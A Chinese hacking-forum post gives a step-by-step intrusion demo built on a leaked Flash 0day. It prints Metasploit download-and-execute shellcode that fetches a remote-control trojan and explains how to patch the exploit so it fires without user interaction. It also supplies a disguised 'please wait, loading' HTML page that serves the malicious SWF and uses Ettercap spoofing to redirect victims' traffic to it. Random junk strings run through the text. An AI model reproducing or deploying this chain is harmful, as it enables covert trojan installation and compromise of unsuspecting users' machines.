找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1565|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 I6 c$ U3 N" S; Q& x3 v. m* V 三、flash 0day之手工代码修改制作下载者实例入侵演示 " h' H# F" L8 H& S+ e) j

4 M- |' L' o; G$ ?$ T2 E

( R1 L# r! k. @. B5 r 利用到的工具: 9 O$ g- H( F$ G8 _$ n% }' V+ X

/ [" Z* ?, ^' i( C( Q1 f6 L

2 m6 b& H) u9 J6 s- {; E+ X Msf ' Z% K: o0 v) z. D

; @6 Z8 B; i+ b9 `

J3 B5 ^) d9 i) I Ettercap 4 J& O! |! n# O4 r. Z# J4 r# `* c/ u* w5 j

' Z( E0 a% g! g7 T j$ r8 @& ?

; Q* f1 `' e Z Adobe Flash CS6 ) `" g' b6 K! S5 [

6 W3 e% Y" L" [) c! r$ c0 B6 n

- r- ?1 N, v C( k Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 * I+ @7 R+ X L# v! f& a

) D% Z5 d% W1 j

! D# h( |! J( t$ H) V; q 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 1 m" U7 |3 ~3 R- D

9 v0 Z3 E0 @$ [" G) }. o

4 |% l+ n. E# ^$ b% y- [2 k 如图: 6 q7 n# J1 L4 ~9 e9 ~5 m

6 V. g& I+ k/ g( j( Y: \' @. |

: Q' k+ ]6 b2 L9 I. r4 T( S- t   4 b' r' R# Q) W. k: e% w

! I4 l; ^# B3 W8 u% h$ e- R

6 l( |0 t4 q1 }6 X   * b* r, B! g- n/ {' m* e+ z

: U' K- w; D8 L( ^, j( s- m2 l

. m+ O' j; c5 Y) j1 o/ F 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 2 U5 P" i2 r' p0 Z/ M- {. d

6 L0 @; b; h7 g" L

$ x c: i/ G) c4 ?6 C. f+ q. G6 M: f5 c   9 g! T0 ~9 r" z! F# b

. T' b8 d5 r9 t' a7 } M1 H3 o

6 u) |5 G0 r( d, o6 m+ Q   6 F- R1 D& j) A/ g# @

2 A& W) {( D$ ?% L6 ]! {5 w M! D' l, i

9 q3 ?, V f; \9 D 然后执行generate -t dword生成shellcode,如下: - H+ ~# Q# h0 l0 q& Q

; G4 M9 F1 {8 H- B, _& g

/ V9 R, m7 m# M0 r   ) r- j' L- h, n4 Z9 {5 q

* Q- Q0 L; X. [5 R

% ^0 M2 V; J3 T) ` 复制代码到文本下便于我们一会编辑flash exp,如下: * j& I2 [+ c5 p3 l

' U" v d; {, F, ~0 n) l

8 k3 q4 B {/ ~+ | 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, / |( W ?3 _0 h7 Q

, F, T; T$ q9 `

* h# Z3 e. ^9 V7 N, P! e5 i 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 9 f7 d9 C- k: k6 S1 H

( n% M" } d' c( r8 Q$ {

! Y! p( }0 [; E 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 3 ?; r& o2 M' x, f$ ]1 N6 v/ V8 ^

' @! d; Q$ _, p5 C$ A* r4 ?

3 j0 j3 E# d* M 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 N3 [9 b, R$ Y- D! W- z1 I U

7 R: X* I' A( \% P4 f& [) P

3 B) V6 X0 w! y# u( _" F+ t 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ! I, h# q" D2 y& d( W

7 p! [. A$ C1 a- V- d2 O' B& z

) d; I$ w8 H7 X) r: U: g. n [ v 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 2 Q9 _: ?0 g6 Q2 p' T

& y( n2 K! {) ?9 p' z" u

1 m9 b1 l, Y& s: a3 ~; `& X; O1 u 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, & K( F- H, n* y$ [

8 {$ B ~% J8 s- `5 p! a+ {

2 N" H5 x, ^+ X1 J. @ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, . ~6 o' u- N# g: o% C* N( v

$ Z2 x. _( K1 I! D

; n5 t' H: w, u- {& m3 a( @ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( H+ _8 V0 r' b/ k6 L+ d; k9 @2 r

4 U" g; h; r* c' V3 l

, R G2 E3 |9 q% ~* x' U. o( T$ c# X 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, }2 q) A5 K1 e* P

+ K9 Z. l' p: p

8 u: d R$ l; Z 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 9 N9 e3 ?: ?1 \9 f

! s% B) y6 \* J: \' I

+ {9 b0 B$ b, X U3 W 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, & L, `- U& j- }, c- j3 Q: b* C! o

. t' L6 l( Z ]* f& f, l

6 N9 R8 D0 F# d; B" J 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ; h( \$ l+ [# r4 d/ q

, n8 g' _5 s H" [, o; v6 J$ p

/ C' o2 N) h0 [* O3 r 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 * Y" m! ^" ] s

2 b; S5 I, C3 O0 i

4 ^* V2 p" r8 q8 N0 u* K& t9 j   3 P5 `+ P3 g& s, {/ V2 f% p

! k/ \1 M3 A/ f. |! \1 T) @

9 Q0 I! e" b7 d2 T   4 i$ Z1 {/ ^" s- H5 {% D

! S" Z( P2 P" ]; D" _. x- {

* \! s3 g1 G" n' [ 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 7 b! ] J; W2 X1 \

" B, D9 x" o! N% U6 K' l+ H/ ]6 t! y& I* t

0 S" C, Y3 `! w3 F5 K- n   8 t6 W! l. H% x& h* g) W

2 \9 M' `. ~9 m2 E" x& h: W

, o* o i5 B- q3 B0 R9 @: d' Z 先修改ShellWin32.as,部分源代码如图: ( ]2 x g6 S% C6 D1 E

+ s! Z2 \! a! B* T

4 C. v6 A! w6 R9 Z# I7 l   * ^) ~% A6 Z; n- E8 \

8 L/ M$ U* z- s

2 q# V6 t4 a" G9 ] 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 7 [) [6 L$ M* g# a$ J

8 E; V: Z5 v/ R

7 }4 E. k2 m7 U# g4 ~6 M; | [   & c0 l4 W, ]) @

% c9 I9 x7 Y W1 _

: l4 t$ v! v8 d' v 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: . L+ k6 y0 f; l5 ^( B" C+ T! D; }+ }

& P) v7 ~: K5 x4 U

- p4 J, x' Q+ I0 J# X   " l7 V4 T$ J( K# P+ z0 |

9 c0 n" {' W; d" y( o

( M% c2 p7 ~; n2 } 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: " u, P' F6 `5 J. y$ B

6 r5 U" \ _. ~6 S$ g# w+ d

- [2 ~2 D6 |- b% K2 O& ~* A   . U1 o1 {1 ^) t8 c

) x- c9 F( i; j0 c: L, D

+ \! |. T4 ]: n# z0 ?. _   4 J4 k4 u8 K% c4 M7 m- {$ S

- S' [! X% g* v' X

c& t& r, ]( Y4 d- O4 G# a- A8 W   1 N2 Z- G, f8 B$ P4 l

. c9 i% O$ {; H( ?) z$ X' R& x8 B0 `, l

) m& u) z$ a2 a+ } 然后点保存,下面我们来编译一下,打开 ) m- \) ~/ d& F# X, g" @2 n9 I

3 F3 m# c% o2 Z% M& Z% s" t

% x6 Y( c6 k( L$ l M exp1.fla然后点文件-发布,看看编译没错误 5 L" L+ M$ E" O+ ~; S

( {: Q" a0 s6 c

* {0 r2 d- n+ }   $ P; x% O: t( E( q0 [

2 U2 t' M* W! l% N( h. e* B! }

. t. Y- K- ~. L8 i" \: x% H- L   \1 U5 K) `& }4 W

# y* x; A8 |: D+ ?0 x4 _. ~ y7 W

& H5 j4 x8 g8 C* X- `+ g   3 h. F7 f. d/ L: K9 p

% R/ g+ S+ {4 b9 Z* J+ M

7 z9 {" e& k. Q# r   9 H( a2 p# v2 P" J9 I, v! P

( X3 D s- T0 B% o: m

: G- q$ j$ a' F2 b/ V9 F& _& x 然后我们把生成的 ]- R9 X* m/ G- g# ?2 k H

4 f- x/ X' H1 s @0 d; @; L4 K& Q

0 }7 g( E: ?0 W* N exp1.swf丢到kailinux /var/www/html下: $ G" i) o' ?! J6 h- L

. {4 V M; {7 C/ Q! I b. @

. W- v6 a8 v! Q; N9 T 然后把这段代码好好编辑一下 ! |% z2 J" E% I

" { G, d2 W2 S$ i) M0 x# ?9 A5 _) X

9 Q2 U- K n% k3 y4 M   ' b, R4 H5 V e# ?3 d

$ A2 D6 I- T+ p7 G

# K& t$ c- C) c; N0 m" K   % W! }# O! M* N4 Y; l

( s* i& Q5 f- |9 t( q+ r

& q4 s7 p+ N: D   " j9 }* s7 I `: v

$ ^- w3 m0 Q* P5 i

: S6 b. p. {" l& w   ' D$ x6 Y( O G" ^6 P4 a) b

/ l, Z* n: o* b2 e8 O$ v- R

3 t3 y* ^4 m" G( d W   5 J( M4 m" H* f; R; X

* m( K: o7 J/ b! L- V: t9 C! Z0 \9 l

) J+ d/ V' s0 i   & }6 t* T" J! ]

: ]. n* u) i/ ]% y

1 X- d( p, Z9 ]1 }% g <!DOCTYPE html> % i) ~ o+ k: {% i, [+ R0 C7 [5 S# P

% H5 p# y& O" l8 e

$ ]1 [8 c* v6 J' M3 E+ q8 m* x <html> / [! q5 D. }7 B' g0 j

( o, b m- h5 h c: |! O9 f6 \( ^

- |0 U: b' O! T7 E6 A <head> 8 @: a, k* \! J/ {

: v4 \0 s6 E9 Z3 c8 r* ]6 g* f

# d$ ^) H) `6 O q G8 t) Y6 H- W <meta http-equiv="Content-Type" content="text/html; ; A2 F$ [1 _* S% x8 J, h

4 E" ~9 v$ _/ o2 L& P6 k

/ u" J5 G2 n# n' G$ g charset=utf-8"/> ' K. X3 t. J; v# X2 g

) f6 J5 o: Y( c

u+ j* E u2 S0 _2 ]: A% S </head> ' t1 m) r2 \6 ?& M5 o! }

. f0 Q4 O9 v/ @: E( @% m$ i

1 B5 X2 U8 c! z; Y g <body> f( u# y$ ^) l; S. J+ Q( t. g0 k

, F( i6 k! o5 [. q, T& `8 d) v

5 P$ }3 {* [0 J0 r <h2> Please wait, the requested page is loading...</h2> ( t7 s# B @( k" p: O

0 y: ^6 ]2 @, b z2 n8 E

1 Y- U0 K' [# r, Z0 @& ^$ [; \ <br> % ]& K, v: w9 ~# v# J

/ @3 V9 G3 _$ X" w: v3 i

- R d1 N% V2 |* P8 s, H <OBJECT 4 f8 D$ P; c' j( @' H2 e9 J4 ~/ ?

* l0 L8 Y% a: D* R: I* G

8 r$ \2 S4 J; p2 E. m+ `8 z, A: Q classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie . K H `1 C+ o+ k7 c/ [& s0 \) u

) i% ^9 P) w5 Y3 Z$ f9 p, S; X

0 q( i( V* E: ]+ r" m VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ! ?) v f9 q c0 m1 H% H% P6 t

7 ?! N; ?: T m" E: e

3 c8 @: K, A. V3 C, a5 n! V$ @- m </body> 9 n3 j& q2 V- I; E% _

- v; M1 r7 x5 C( k

i: R- W. f8 P% O( L6 \; x3 r <script> 3 H# \9 v0 x# r! g# l- O

# A. l6 }0 P0 i2 B

( f u9 B; Z: K# M) a1 e( a     setTimeout(function () { ! M3 V3 j" }/ d3 x

$ {( z- X2 v9 Z6 \ e' _

! S H2 V: H4 t4 e; Q4 z2 K" y          % M* e! |! V, Z5 P1 R$ V

/ D/ a( b7 Q$ f% f; o/ s' p8 c! r! C

* y1 T0 v$ _1 }4 |; U" j# T window.location.reload(); # u- l( ]* \, o& K# r. q0 s% P. v# q

0 _) G; V* l5 H7 Y

$ }. Y- @3 }1 n% H; c8 ^: m% M     }, 10000); " q; L! \/ ~* m1 L0 j8 L$ X

2 {8 d, o3 u; R: R5 r8 Q8 I, W

" A: T P3 r& ]7 K: F p# Y3 }   " F) g" W4 E7 Q ?9 g; t. b

; W3 J' M. ~$ m: O4 k% f

8 Z! `. c- |4 N9 x7 ]) v3 H, ^ </script> $ ?& y# r+ N* ?0 ?

& y* k& R0 W0 v$ J

Y N7 Z5 W* M/ T! r4 O& A, ^ </html> * y0 I9 M; o5 _/ ~0 f* Q: [

2 N! d) V8 }/ ]) b4 T

! G6 Q5 g$ ?0 Z& [5 Z4 ]/ M% S- E   % c+ L! j u6 O

3 |" T5 }4 o: W: h, s" ?' @5 D

, M8 E6 f( [6 t! ] 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 7 L2 o. P3 R6 u7 v/ h

3 s( O' S V% H% v$ y) d

! t& H3 R0 J. u   7 ?# [* H6 @; c/ G; o$ j/ |) n

$ S% O+ ^: X) U4 e( e5 [. m {

N# W! _8 x$ @   0 J8 a! F9 m; }- _5 D

& [" ?& q G h* m$ \% \

# s. |. o0 E3 i/ T, Y   - \$ h7 X5 Q: ?, z

3 R; O& p. O' |5 l* @8 @

, K; i! ^: \ |   6 S& r3 h/ R! c, c% t* H

7 p% {! y. z1 \, ?% [# a" T- Q: K

" a% g& l" g J* Y0 o3 M   * z- V5 T; T6 G

' B5 ?+ p" I' f! O: O; C. L. i

" m& W& m% c4 \ 下面我们用ettercap欺骗如图: ( B* U! B( x0 A+ a h) z

2 D* k% M4 |) T1 Y/ F( Y- A" x& o# q

+ f% m( d2 d6 q3 S; ^   $ l( @3 R# L( {: o0 S" b3 g

( x9 w& W1 G9 @4 V) M# G8 l

. d* ^ D/ w$ B; Q2 s   " F6 d- P( o w1 _4 j* L

7 N' e/ Q" ~- U* d# I3 Y9 e! R

6 D4 [# q$ D( H! q: T& ?9 ]3 x) l% o 下面我们随便访问个网站看看: ( r J$ j2 e! y/ Z

) a! _& l! {$ q3 J3 S3 K

$ ?+ ?, V; q0 ]. { 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 3 _$ W1 |7 P5 [

: _: a' ^4 C7 C; H7 ]5 {! L

* u1 p; Q3 G. B6 F% |5 M8 e/ s   ! m J6 A0 ?7 w% M+ e2 T

/ x9 {+ Y$ Y6 @1 c

; b$ D. R2 W+ S. n9 h 我们看另一台, 4 l0 V8 Z3 M& C% g4 i

6 {+ D p2 F4 b [8 s X. J

! E6 ^1 y2 A# Y* Y5 F a% ]" E- {8 B 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 + y0 J' V5 q o, l6 j8 D- V/ \

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表